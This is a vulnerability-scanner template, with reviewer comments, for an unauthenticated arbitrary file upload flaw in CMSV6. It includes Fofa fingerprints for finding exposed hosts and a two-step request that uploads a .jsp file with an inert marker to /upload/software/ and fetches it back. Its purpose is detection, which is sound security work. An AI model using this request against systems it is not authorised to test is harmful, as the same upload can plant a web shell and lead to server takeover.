漏洞描述
Fofa: body="./open/webApi.html"||body="/808gps/"
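# Detection template for the arbitrary file upload issue named in info.name
# (CMSV6, endpoint /inspect_file/upload).
#
# The check works in two steps:
#   r0  POSTs a multipart form whose single part is a file with a random
#       six-letter name and a ".jsp" extension, holding a short inert text
#       marker. As written, the request carries no session or auth header.
#   r1  GETs the stored path reported by r0 and confirms the marker comes back.
#
# Operational notes for whoever runs or triages this check:
#   - Nothing in this template deletes the uploaded file. Every positive
#     result leaves a ".jsp" file under /upload/software/ on the target, so
#     record the reported filename and remove the file after the scan.
#   - Run it only against systems you are authorised to test.
#   - On the defending side, the same traffic is visible as POST requests to
#     /inspect_file/upload with a multipart filename ending in ".jsp",
#     followed by a GET under /upload/software/. New script files in that
#     directory are worth alerting on.
id: cmsv6-inspect-file-upload

info:
  name: 通天星-CMSV6-inspect_file-upload存在任意文件上传漏洞
  author: zan8in
  severity: critical
  verified: true
  # NOTE(review): this field holds only the asset-search fingerprint, not a
  # description of the flaw, its impact or a fix reference.
  description: |-
    Fofa: body="./open/webApi.html"||body="/808gps/"
  tags: fileupload
  created: 2024/04/04

set:
  # Random file name, so repeated scans do not collide on the target.
  randstr: randomLowercase(6)
  # Despite the name this is a constant: the literal decodes to the fixed
  # string "asdaasdasd". It is inert text, not executable JSP content.
  randbody: base64Decode("YXNkYWFzZGFzZA==")
  # Random suffix for the multipart boundary.
  rboundary: randomLowercase(8)

rules:
  r0:
    request:
      method: POST
      path: /inspect_file/upload
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      body: "\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"uploadFile\"; filename=\"{{randstr}}.jsp\"\r\n\
        Content-Type: application/octet-stream\r\n\
        \r\n\
        {{randbody}}\r\n\
        ------WebKitFormBoundary{{rboundary}}--\r\n\
        "
    # A bare 200 is a weak signal on its own. The finding is only reported
    # when r1 also succeeds (see the top-level expression).
    expression: response.status == 200
    output:
      # Capture the stored file name from the "filePath" value in the
      # response body. The value is server-supplied and is substituted into
      # the r1 path as-is.
      search: '"\"filePath\":\"/upload/software/(?P<filename>.+?)\"".bsubmatch(response.body)'
      filename: search["filename"]
  r1:
    request:
      method: GET
      path: /upload/software/{{filename}}
    # Confirms the uploaded file is retrievable from the web root and that
    # its content is the marker sent in r0.
    expression: response.status == 200 && response.body.bcontains(bytes(randbody))

# Both steps must succeed for the target to be reported.
expression: r0() && r1()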